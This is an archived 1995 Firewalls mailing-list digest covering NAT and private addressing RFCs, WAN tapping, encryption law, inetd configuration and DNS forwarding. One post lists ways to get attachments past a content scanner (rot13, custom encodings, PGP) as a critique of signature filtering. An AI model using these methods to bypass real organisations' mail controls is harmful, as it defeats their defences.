I read RFC1627 and I am not happy with it. I will not discuss every item in it in this forum, although I think that this could be useful. The authors claim that RFC1597 has 'not the benefit of the usual, public review and approval by the IETF or IAB'. Can someone tell me whether they did it better with RFC1627? If so, I will stop complaining in public about an RFC full of logic that I can not understand. I hope that the authors of both RFCs have been speaking with each other lately and come with a compromise (we like compromises in Belgium). Maybe this is the revision of RFC1597 I read about in a note in this forum from Eliot Lear. I hope to find a reference to this new RFC in this forum.

From firewalls-owner Mon Oct 2 06:00:10 1995
Message-Id: <199510021256.FAA18196@miles.greatcircle.com>
From: Darren Reed
Subject: Firewall-1: Patent-pending ?
To: Firewalls@GreatCircle.COM (Firewalls Mailing List)
Date: Mon, 2 Oct 1995 22:55:09 +1000 (EST)

This might be stretching the charter a bit...

In the advertising material for Checkpoint's Firewall-1 (version 1.2) which I picked up recently, there are two mentions of "patent pending". There is NO mention of any application numbers that I can find or any further information on this. Having sent e-mail to Checkpoint last week and having received no reply (surprised - NOT) I'm wondering if this is just a game.

Can anyone provide some more information about the pending patents, such as application numbers or the applications themselves?

Thanks,
Darren

From firewalls-owner Mon Oct 2 06:24:03 1995
From: bmanning@ISI.EDU
Posted-Date: Mon, 2 Oct 1995 05:40:33 -0700 (PDT)
Message-Id: <199510021240.AA11534@zed.isi.edu>
Subject: Re: Book recommendations
To: long-morrow@CS.YALE.EDU
Date: Mon, 2 Oct 1995 05:40:33 -0700 (PDT)
Cc: firewalls@GreatCircle.COM, mikes@emj.ca
In-Reply-To: <199509291550.LAA17451@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Sep 29, 95 11:50:21 am

> > There are 3 main books on Internet Firewalls currently available:
> >
> > 1. Bellovin and Cheswick, "Firewalls and Internet Security"
> >
> > 2. Siyan and Hare, "Internet Firewalls and Network Security", New Riders Pub.
> >
> > 3. Chapman and Zwicky, "Building Internet Firewalls", O'Reilly & Associates
>    (more info at URL http://www.greatcircle.com/firewalls-book/)
>    ISBN 1-56592-124-0, just released.
>
> I've also seen references (rumors?) on this list about an upcoming book
> by Marcus Ranum and Tina Darmohra to be published by Prentice Hall.
> Anyone care to confirm?
>
> - Morrow
>

A basic grounding in Network Security is useful -BEFORE- building a firewall. I recommend:

    Kaufman, Perlman, Speciner, "Network Security", Prentice Hall
    ISBN 0-13-061466-1

first.

--bill

From firewalls-owner Mon Oct 2 06:30:17 1995
Date: Mon, 2 Oct 1995 06:52:48 -0600
To: eddiem@ad1.srv.ad.mey.nl, firewalls@GreatCircle.COM
From: dan@fsa.ca (Dan Freedman)
Subject: Re: PowerBroker
Cc: jthimer@iras.ucalgary.ca (Jthimer)

>When designing, implementing and running a firewall system, not only
>technical problems come in to play.
>
>A firewall system can be considered as a single point of entry, which is
>designed to provide adequate protection against the "bad boys" populating
>the outside world. IT crime statistics however show that over 80% of all IT
>fraud is committed by insiders. One should therefore also ensure that the
>firewall is protected against insiders with bad intentions. One of a set of
>measures to implement such protection is the application of the principle of
>"segregation of duties" (also known as the "need to know" principle). The
>idea is that it should NOT be possible for one person to completely manage
>all parts of a gateway system. If implemented correctly, it takes at least
>two persons to break the protection, which reduces the probability of IT
>fraud occurring.
>
>Does anybody on the list have practical experience with the implementation
>of this principle in a firewall environment?
>
>Eddie Michiels
>Moret Ernst & Young EDP Audit Management Services, Amsterdam
>tel. 020 5497 208

You might want to take a look at FSA Corporation's PowerBroker software, which controls and logs access to the power of root across a UNIX network (soon to include NT as well). For more info on PowerBroker and other security software, please see http://www.fsa.ca or send email to sales@fsa.ca or call (403) 264 4822.

Dan Freedman
______________________________________________________________________________
Dan Freedman, Director, FSA Corporation.
1011 First Street SW, suite 508, Calgary, Alberta, Canada T2R 1J2
phone (403) 264 4822, fax (403) 264 0873, email: dan@fsa.ca
--->> FSA Corp WWW site: http://www.fsa.ca
______________________________________________________________________________

From firewalls-owner Mon Oct 2 06:52:46 1995
Date: Mon, 2 Oct 95 14:18:35 +0100
From: sten@ergon.CH (Sten Gunterberg)
Message-Id: <9510021318.AA08749@mozart.ergon.ch>
To: firewalls@greatcircle.com
Subject: Re: non-root low ports (was: Firewall on Solaris 2.4, truss, CERN httpd mods.)

> > Am I correct in my understanding that on Unix systems the only reason
> > root is needed at all on many of these network services is in order to
> > open ports below 2000? This feature is intended to increase security
> > somewhat on multi-user systems. But it seems that on firewalls, where
> > you typically have no regular users, it's a prime suspect in
> > _decreasing_ security by having all these daemons launched as root.
>
> Yes, the point of making root only able to bind to certain ports is for
> security, 1-1023 are reserved by default. Solaris has a kernel option
> to let you change that number.
The following reports the (current) lowest port number usable without being root (default = 1024):

    ndd /dev/tcp tcp_smallest_nonpriv_port

To redefine it to 21 (to enable the ftpd to run as non-root) use

    ndd -set /dev/tcp tcp_smallest_nonpriv_port 21

somewhere in the boot sequence. I suggest at the end of /etc/init.d/inetinit (this is linked to /etc/rc.2/S69inet).

BTW, to see the TCP parameters Solaris 2.x provides:

    ndd /dev/tcp \?

From firewalls-owner Mon Oct 2 07:22:51 1995
Date: Mon, 2 Oct 1995 10:00:54 -0400 (EDT)
From: Mike Malik -- Dover DE
To: Edward Maillet
Cc: firewalls@GreatCircle.COM
Subject: Re: How secure is a WAN then?
In-Reply-To: <9509300107.AA18383@doc.cs.usm.maine.edu>

Well, there are several encryptors that work with frame relay. (The process is actually simple: encrypt everything between the FR flags.) But of course the U.S. Gov. might have ideas about who and where you can use them.

Mike

Mike Malik (mam@ssds.com)
9841 Broken Land Parkway, Suite 100, Columbia, MD 21046
business driven technology solutions
410-381-4313  FAX: 410-381-2170

From firewalls-owner Mon Oct 2 07:55:09 1995
From: gblolmxb@ibmmail.com
Message-Id: <199510021438.HAA21369@miles.greatcircle.com>
Date: Mon, 02 Oct 1995 10:39:45 EDT
To: firewalls@GreatCircle.com

Frank Willoughby wrote that when sending encrypted mail to a French destination, one must supply the French Gov. with a key. If I, based in London, England, were to send an encrypted message (say using PGP with a 1024-bit key) to someone in France, and the French state found out, who would they prosecute? They can't touch me, and all the recipient has to prove is that the message was unsolicited - or am I missing something here?

Mark Blackman.
From firewalls-owner Mon Oct 2 08:00:35 1995
Date: Mon, 2 Oct 1995 10:37:18 -0700
Message-Id: <199510021737.KAA13589@Fe3.rust.net>
To: Edward Maillet
From: janken@rust.net (Kenneth J. Stephens)
Subject: Re: How secure is a WAN then?
Cc: firewalls@greatcircle.com

>All the talk of ATM and stuff got me thinking about WANs in general.
>Consider the following:
>My company (me.com) has offices in Europe and headquarters in the US. If we use
>dedicated leased lines from the US to Europe (say from AT&T or MCI), can
>someone in between get our data?
>What about if we used a "cloud" style network like ATM or Frame Relay which use
>PVCs instead of dedicated circuits?
>
>I have often wondered about this because a connection from say New York would
>go through NYNEX, MCI (or other), then France Telecom. That's three real big
>uncontrolled portions of my Net.
>
>Any thoughts? (preferably relating to the topic at hand and not just random
>musings.)
>----- Ed
>maillet@cs.usm.maine.edu
>

I read Alan Hannan's post before adding this one (Outstanding Post by the way). One small question! Given the history of information interception in France, why would anyone believe France Telecom has any validity as a secure carrier? Encrypt, Encrypt, Encrypt if your data is at all important to your bottom line.

Ken

Ken Stephens, Senior Capacity Planner/Data Security Officer
email: Ken_Stephens@miconsulting.com
Michigan Employment Security Commission (MESC)
7th Fl. I.S., 7310 Woodward Ave, Detroit, MI 48202
Voice (313) 876-5081, Fax (313) 876-6827

Millennium Consulting
28234 Diesing Dr.
Madison Heights, MI 48071

"Your Security Policy is only as strong as your organization's commitment to it."

From firewalls-owner Mon Oct 2 08:30:38 1995
Date: Mon, 02 Oct 1995 16:21:00 BST
From: John Armstrong
To: firewalls@greatcircle.com
CC: john@leva.leeds.ac.uk
Message-ID: <0099746B.86BCF016.1@leva.leeds.ac.uk>
Subject: Brent's book

Does anyone know if anything has been decided about shipping Brent's new firewall book to non-US/Canada addresses - particularly to the UK?

There was some correspondence (before the recent conference) on the list about sorting out shipping for us 'foreigners', but I haven't seen anything more recently. The order form in the Firewalls_Book.Txt file only mentions shipping within the US, as does the automated message from firewall-info.

Do I have to get one of my US friends to buy the book and post it on to me or is something else in the pipeline?
Thanks

John Armstrong
john@leva.leeds.ac.uk

From firewalls-owner Mon Oct 2 08:30:42 1995
Date: Mon, 2 Oct 1995 07:53:54 -0700
From: peterg@airdata.com (Peter Gregory)
Message-Id: <9510021453.AA02912@radiatore.mccaw-stg.com>
To: firewalls@greatcircle.com
Subject: Re: How secure is a WAN then?

> My company (me.com) has offices in Europe and headquarters in the US. If we use
> dedicated leased lines from the US to Europe (say from AT&T or MCI), can
> someone in between get our data?

Absolutely. A CO switch at one of the local phone companies in this part of the country was broken into and dedicated circuits tapped and listened to. Because of this recent incident, my present client's "private" T1 circuits are link-encrypted.

Pete

From firewalls-owner Mon Oct 2 09:00:35 1995
Message-Id: <199510021540.IAA22930@hubbub.cisco.com>
To: toon@cem-bb.e-mail.com
Cc: firewalls@greatcircle.com
Subject: Re: RFC 1597
In-Reply-To: Your message of "Mon, 02 Oct 95 08:33:01 EDT." <199510021231.FAA17889@miles.greatcircle.com>
Date: Mon, 02 Oct 95 08:40:37 PDT
From: Yakov Rekhter

> I really like the idea of what is proposed in RFC1597, this is (I think)
> AT PRESENT (before the general implementation of IPv6, who knows when)
> THE SOLUTION for small companies with a potential need for a lot of
> IP addresses (printers, LAN print boxes, ... ).
> To connect such a network to the Internet, I understand that one needs
> the proper kind of firewall (dual-homed gateway, nice name). To make
> this work perfectly one would like to have the possibility to reserve a
> small part of the official addresses (class C?) to be 'translated' in a
> static way to the internal addresses of the servers to be reached from
> the outside world. The remaining part should make a 'pool' to be
> dedicated dynamically (only when needed) for those IP hosts that need
> connection from the inside to the Internet.

Static translation is one possibility. But it is not the only one. It is also possible to rely only on dynamic translation, but this would involve interaction between a NAT and DNS.

> I read RFC1627 and I am not happy with it.
> I will not discuss every
> item in it in this forum, although I think that this could be useful.
> The authors claim that RFC1597 has 'not the benefit of the usual, public
> review and approval by the IETF or IAB'. Can someone tell me whether
> they did it better with RFC1627.

RFC1627 was not approved by the IETF. RFC1627 was not approved by the IAB.

> If so, I will stop complaining in
> public about an RFC full of logic that I can not understand.
> I hope that the authors of both RFCs have been speaking with each
> other lately and come with a compromise (we like compromises in Belgium).
> Maybe this is the revision of RFC1597 I read about in a note in this
> forum from Eliot Lear. I hope to find a reference to this new RFC in
> this forum.

The document that Eliot was referring to is presently an Internet Draft (draft-ietf-cidrd-private-addr-03.txt). The CIDRD Working Group is working on moving this Internet Draft towards an RFC with the status of BCP (Best Current Practices).

Yakov Rekhter

From firewalls-owner Mon Oct 2 09:00:53 1995
To: firewalls@greatcircle.com
From: mcr@milkyway.com (Michael Richardson)
Subject: Re: RFC 1597
Date: 2 Oct 1995 11:27:14 -0400
Organization: Milkyway Networks Corporation, Ottawa, ON
Message-ID: <44p0ci$8nv@metis.milkyway.com>
References: <199510021231.FAA17889@miles.greatcircle.com>

In article <199510021231.FAA17889@miles.greatcircle.com>, wrote:
>the proper kind of firewall (dual-homed gateway, nice name). To make
>this work perfectly one would like to have the possibility to reserve a
>small part of the official addresses (class C?) to be 'translated' in a
>static way to the internal addresses of the servers to be reached from
>the outside world. The remaining part should make a 'pool' to be
>dedicated dynamically (only when needed) for those IP hosts that need
>connection from the inside to the Internet.

Well, an application layer gateway (and some filters) can provide simple translation to the IP of the firewall. It is trivial to decide to use another address, but you may *not* want to do this dynamically. Why? That gives no information to the remote machines about who is connecting via DNS. If you do not want to give them info, then use either the firewall itself (often called gateway.foo.com, or foo.com), or use some "typical" name like "marketing.foo.com" for all the PCs in marketing.

The other reason not to dynamically allocate things is that it makes rules a pain. That isn't to say that you need to have a different IP for each utility device (each printer). You might have 1 "printers.foo.com" (or service.foo.com) with rules that map 100 ports on that "virtual machine" to the correct lprXX.foo.com:515. Why you want people from the untrusted side to be able to print is not a question I'll ask right here :-)

>MY QUESTION: Does someone already work in this way?

Yes.

>I read RFC1627 and I am not happy with it. I will not discuss every
>item in it in this forum, although I think that this could be useful.

My feeling is some group of managers at large companies do not want to spend money on IPv6 now.
If RFC1597 can avoid the crunch, they think, then do not spend money. 1627 is a response from the engineering people who say (quite rightly) "you snooze, you lose".

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.

From firewalls-owner Mon Oct 2 09:30:57 1995
Date: Mon, 2 Oct 1995 09:23:08 -0800
To: John Armstrong, firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Brent's book
Cc: john@leva.leeds.ac.uk

At 4:21 PM 10/2/95, John Armstrong wrote:
>Does anyone know if anything has been decided about shipping Brent's new
>firewall book to non-US/Canada addresses - particularly to the UK?
>There was some correspondence (before the recent conference) on the list
>about sorting out shipping for us 'foreigners', but I haven't seen anything
>more recently. The order form in the Firewalls_Book.Txt file only mentions
>shipping within the US, as does the automated message from firewall-info.
>
>Do I have to get one of my US friends to buy the book and post it on to me
>or is something else in the pipeline?

I must apologize for the delay, to everyone outside the USA who has ordered a copy. We've only had the books for a little over a week, during which time I've been at 2 different conferences on different sides of the USA. Today is my first day in the office in 2+ weeks; unfortunately, my assistant, who has been doing all the research on international mailing options, won't be here until tomorrow.

One of the first things on our agenda for tomorrow is to make a decision on how to ship the international orders. We've been having a hard time finding a reasonable option that looks like it will get the books there intact, in a timely fashion, for less than the price of the book. I don't know what my assistant has come up with in the last couple of weeks while I've been gone. Those who've placed international orders should expect to hear from us by email (assuming your email address was on the order) this week, either that the order has shipped, or offering a range of shipping options and asking which you prefer.

By the way, all USA orders received prior to 25 Sep (last Monday) shipped on 25 Sep via US Postal Service Priority Mail (except for a couple of large orders, which shipped UPS). Everyone should probably have received their copy by now. We understand that the Postal Service may have mangled some of them; if so, let us know (email to "book-orders@greatcircle.com" is the best way, or call 800/270-2562), and we'll make it right. Orders placed last week (after 25 Sep) will be shipped this week.

Thanks!
-Brent

--
Brent Chapman         | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street   | Tutorial-Info@GreatCircle.COM
+1 415 962 0841       | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Mon Oct 2 09:54:56 1995
Date: Mon, 2 Oct 1995 12:36:07 -0400 (EDT)
From: Steven ANQL Davey
To: firewalls@greatcircle.com
Subject: REQUEST FOR FIREWALL INFORMATION / DOCUMENTATION

Can anyone please provide any information / documentation on the following firewall topics:

1.) Firewall Installation Master Plan.
2.) Firewall Installation Test Scripts.
3.) Firewall Trouble-shooting Procedures.
4.) Firewall Emergency Response Procedures.

I realize that the details and specifics of this documentation may depend on the firewall to be, or already, implemented; however, I am looking for general standards and templates as a starting point.

Thank you in advance to those who can provide me with this information.

Sincerely,
Steven A.N.Q.L. Davey

From firewalls-owner Mon Oct 2 10:00:46 1995
From: John.Karnes@corp.wrgrace.com
Date: Mon, 2 Oct 95 12:38:27 -0400
Subject: RE:
To: firewalls@GreatCircle.COM, gblolmxb@ibmmail.com

> Frank Willoughby wrote that when sending encrypted mail to a French
> destination, one must supply the French Gov. with a key. If I, based
> in London, England, were to send an encrypted message (say using PGP
> with a 1024-bit key) to someone in France, and the French state found
> out, who would they prosecute? They can't touch me, and all the
> recipient has to prove is that the message was unsolicited - or am I
> missing something here?
>
> Mark Blackman.
>

While the government of France could not do much, if anything, to you, I'm sure they could make things unpleasant for the recipient.
John From firewalls-owner Mon Oct 2 10:25:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26005 for firewalls-outgoing; Mon, 2 Oct 1995 09:37:52 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA25998 for ; Mon, 2 Oct 1995 09:37:48 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id MAA12529; Mon, 2 Oct 1995 12:16:49 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id KAA26661; Mon, 2 Oct 1995 10:59:08 -0400 (EDT) Date: Mon, 2 Oct 1995 10:59:08 -0400 (EDT) Message-Id: <199510021459.KAA26661@SPARKY.CF.CS.YALE.EDU> To: chris@dejong.com, scorp@un.kiev.ua Subject: Re: Mail Proxy Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Tyler wrote: > >Slava Kritov writes: > >> Any uuencode ? >> Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange >> word docs in uuencode, and ( for Mac's ) you can't even say its word doc >> based on name ... > >Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So >you look for the uuencode signature string and deny. But by only looking for the 'signature's of known binary encoding formats you then open yourself up for people to create their own encoding formats to get around your scan for, and restriction on encoded message enclosures. 3 possibilities for getting around a scan for known encoding signatures : 1. rot13 a uuencoded file before e-mailing it. Describe in the message how to unrot13 the message before uudecoding it. 2. Use an (admittedly) inefficient format for encoding binary, such as: RAVE AFRO STUB DAM HONE HAY CLAD WILL JOIN PET LONG WEED ... The recipient will need a decoder of course. 3. PGP encrypt the entire message before transmitting. 
How will the mail scanner know what is inside the message? Are you going to reject all encrypted messages? I think that encrypted messages will increasingly become the norm on the Internet as PC based mail programs incorporate automatic easy-to-use PGP encryption.

- Morrow

From firewalls-owner Mon Oct 2 10:30:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25733 for firewalls-outgoing; Mon, 2 Oct 1995 09:32:44 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA25725 for ; Mon, 2 Oct 1995 09:32:40 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id MAA12711; Mon, 2 Oct 1995 12:29:29 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id LAA26704; Mon, 2 Oct 1995 11:11:49 -0400 (EDT) Date: Mon, 2 Oct 1995 11:11:49 -0400 (EDT) Message-Id: <199510021511.LAA26704@SPARKY.CF.CS.YALE.EDU> To: cosborn@bbn.com, firewalls@greatcircle.com Subject: Re: Running ftpd on another port Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>I am trying to run 2 ftp servers on one machine. One ftpd will always run
>chroot and be used primarily for the public (wu-ftpd has all those nice
>"features"). The other ftpd will be skey enabled and will have access
>to the rest of the file system. One problem: I can't figure out how to
>have the logdaemon ftpd run on another port. It can run on any port (high
>ports are fine!). I can't find a compile switch or parameter on the
>daemon (clients of course are no problem.)

You can use tcp_wrapper programs to exec either (or none) of the two ftp servers based on incoming IP address (ACLs of IP hosts, networks or domain names).
But if you just want to run an internal skey-enabled ftpd on a different port than your WU-FTP daemon, you should be able to create a special service name for it (i.e. skeyftp) in the /etc/services file (on Unix) and run your skey ftpd out of inetd by putting an entry in the /etc/inetd.conf file for it:

    skeyftp stream tcp nowait root /usr/local/etc/skey.ftpd

I run an inbound telnet server which uses the skey login program on TCP port 22 this way and leave the normal telnet program on port 23 (actually I often run a tarbaby telnetd on port 23 on machines likely to be attacked via telnet because of their function or hostname):

    # run secure key login telnet daemon on port 22
    # telnetd invokes S/keylogin
    #
    skeylogin stream tcp nowait root /usr/local/etc/skey.telnetd
    #
    # tar baby telnet server
    telnet stream tcp nowait root /usr/local/etc/in.tarbaby.telnetd in.telnetd

- Morrow

From firewalls-owner Mon Oct 2 10:54:53 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA28062 for firewalls-outgoing; Mon, 2 Oct 1995 10:33:33 -0700 Received: from mail1.digital.com (mail1.digital.com [204.123.2.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA28055 for ; Mon, 2 Oct 1995 10:33:30 -0700 Received: from ilosrv.ilo.dec.com by mail1.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA31571; Mon, 2 Oct 1995 10:10:17 -0700 Received: from ilofrs.ilo.dec.com by ilosrv.ilo.dec.com; (5.65/1.1.8.2/12Nov94-8.2MPM) id AA07813; Mon, 2 Oct 1995 18:09:12 +0100 Received: by fwsrtr.fws.ilo.dec.com; (5.65/1.3/10May95) id AA15816; Mon, 2 Oct 1995 18:10:05 +0100 Received: from karpov.fws.ilo.dec.com by hubba.fws.ilo.dec.com; (5.65/1.1.8.2/21Aug95-8.2MPM) id AA03451; Mon, 2 Oct 1995 18:10:16 +0100 Organization: Digital Firewall Engineering Received: by karpov.fws.ilo.dec.com; (5.65v3.2/1.1.8.2/18Aug95-0213PM) id AA09875; Mon, 2 Oct 1995 18:09:42 +0100 From: Dermot Tynan Message-Id: <9510021709.AA09875@karpov.fws.ilo.dec.com> Subject: Re: your
mail To: gblolmxb@ibmmail.com Date: Mon, 2 Oct 1995 18:09:42 +0000 (BST) Cc: firewalls@GreatCircle.com In-Reply-To: <199510021438.HAA21369@miles.greatcircle.com> from "gblolmxb@ibmmail.com" at Oct 2, 95 10:39:45 am Content-Type: text Content-Length: 442 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

gblolmxb@ibmmail.com wrote:
>
>
> If I, based
> in London, England, were to send an encrypted (say using PGP with a
> 1024 bit key) to someone in France, and the French state found out,
> who would they prosecute? They can't touch me,

That was what a group of hackers on the Mururoa Atoll thought...

- Der
--
Dermot Tynan +353 91 754608 dtynan@ilo.dec.com DTN: 822-4608 Digital Equipment International BV, Galway, Ireland

From firewalls-owner Mon Oct 2 11:03:52 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA28855 for firewalls-outgoing; Mon, 2 Oct 1995 10:54:22 -0700 Received: from mailhost.targetvision.com (targetvision.roc.servtech.com [204.181.11.235]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA28848 for ; Mon, 2 Oct 1995 10:54:18 -0700 Received: by localhost from mailhost.targetvision.com (router,WinSmtp -Win32- V1.07beta1.8); Mon, 02 Oct 1995 13:56:27 Received: from sybil by mailhost.targetvision.com (204.249.123.65::mail daemon,WinSmtp -Win32- V1.07beta1.8); Mon, 02 Oct 1995 13:55:51 X-Sender: Larry Helber X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Darren Reed From: Larry Helber Subject: Re: Firewall-1: Patent-pending ? Cc: Firewalls@GreatCircle.COM Date: Mon, 02 Oct 1995 13:56:27 Message-Id: <19951002135627.3800b79d.in@mailhost.targetvision.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I don't know the information that you are looking for, but if someone has a patent pending then you will not get any information out of the patent office.
A patent number and the information contained in the submitted documents do not have to be disclosed until the patent is approved. Also, a pending patent may be amended, which will defer the issue date of the patent. As long as you keep updating the patent on a yearly basis your patent will never get issued.

>
>
>This might be stretching the charter a bit...
>
>In the advertising material for Checkpoint's Firewall-1 (version 1.2)
>which I picked up recently, there are two mentions of "patent pending".
>
>There is NO mention of any application numbers that I can find or any
>further information on this.
>
>Having sent e-mail to checkpoint last week and having received no reply
>(surprised - NOT) I'm wondering if this is just a game.
>
>Can anyone provide some more information about the pending patents, such
>as application numbers or the applications themselves ?
>
>Thanks,
>Darren
>
>

From firewalls-owner Mon Oct 2 11:24:54 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29810 for firewalls-outgoing; Mon, 2 Oct 1995 11:18:59 -0700 Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.de [193.141.169.26]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA29803 for ; Mon, 2 Oct 1995 11:18:55 -0700 Received: (from uucp@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id TAA14262; Mon, 2 Oct 1995 19:12:27 +0100 Received: from grizzly.genua.de(192.109.217.33) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) id sma014260; Mon Oct 2 19:12:00 1995 Received: from grizzly.genua.de (schneck@localhost [127.0.0.1]) by grizzly.genua.de (8.6.12/8.6.12/bs01) with ESMTP id TAA10902; Mon, 2 Oct 1995 19:16:53 +0100 Message-Id: <199510021816.TAA10902@grizzly.genua.de> To: gblolmxb@ibmmail.com cc: firewalls@greatcircle.com Subject: Re: [none] MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <10898.812657809.1@grizzly.genua.de> Date: Mon, 02 Oct 1995 19:16:50 +0100 From:
Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Frank Willoughby wrote that when sending encrypted mail to a French
> destination, one must supply the French Gov. with a key. If I, based
> in London, England, were to send an encrypted (say using PGP with a
> 1024 bit key) to someone in France, and the French state found out,
> who would they prosecute? They can't touch me, and all the recipient
> has to prove is that the message was unsolicited - or am I missing
> something here?

Yes ... your next visit to the Cote du Rhone ...

\Bernhard.

PS: This holds even if you send from London to me in Munich and the packets happen to hop through France.
PPS: I understand this is current law, but not actively prosecuted
PPPS: I'm not a lawyer (and will never be one)

From firewalls-owner Mon Oct 2 11:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29700 for firewalls-outgoing; Mon, 2 Oct 1995 11:16:46 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA29693 for ; Mon, 2 Oct 1995 11:16:39 -0700 Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA10219; Mon, 2 Oct 1995 14:15:05 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id OAA01633; Mon, 2 Oct 1995 14:14:49 -0400 Message-Id: <199510021814.OAA01633@calloway.bwh.harvard.edu> Subject: Re: non-root low ports To: ken@bridge.com (Ken Hardy) Date: Mon, 2 Oct 1995 14:14:48 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509291355.AA21881@ignatz.bridge.com> from "Ken Hardy" at Sep 29, 95 08:55:24 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit
Content-Length: 738 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Ken Hardy wrote:
| It seems to me that it would be worthwhile to patch the kernel for the
| firewall to not require root to open low ports. I cannot imagine (not
| having examined the sources, yet) that it would be too difficult to
| find and modify this behaviour in the BSD sources.

It strikes me that a better idea (and one mentioned in C&B) is to have a small program to open the privileged port, and then exec the daemon. This has the benefits of not requiring kernel source modifications to work, and being small and somewhat closer to verifiable.

So, does anyone have such a program written that they'd be willing to share?

Adam
--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Mon Oct 2 12:09:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01048 for firewalls-outgoing; Mon, 2 Oct 1995 11:51:41 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA01037 for ; Mon, 2 Oct 1995 11:51:33 -0700 From: Chris Tyler To: Firewalls@GreatCircle.COM Date: Mon, 2 Oct 1995 14:49 EDT Subject: Dual-DNS Problems Content-Length: 1060 Content-Type: text/plain Message-ID: <307034420.19df@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Back with more dual-DNS problems.

Background: DNS server 1 is internal DNS, can't reach the real world directly, but can reach server 2. Server 2 is external DNS and 'forwarder' for internal DNS server 1.

Situation 1: DNS server 1 'slave' flag in named.boot is *not present*. DNS resolves are done quickly and correctly the first time, but server 1 keeps generating UDP packets aimed at outside servers (which can't reach outside of the secure net).

Situation 2: DNS server 1 'slave' flag in named.boot *is* present. Non-cached DNS resolves requested by internal hosts often (usually?)
fail on the 1st try, and sometimes on the 2nd, but almost always resolve on the 3rd try. No UDP packets from server 1 are aimed at real-world servers.

Sounds like a timeout problem, but this doesn't make sense, because the timeout should happen in Situation #1 as well. *Why* is this happening?

Any help... TIA.

Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399

From firewalls-owner Mon Oct 2 12:24:29 1995
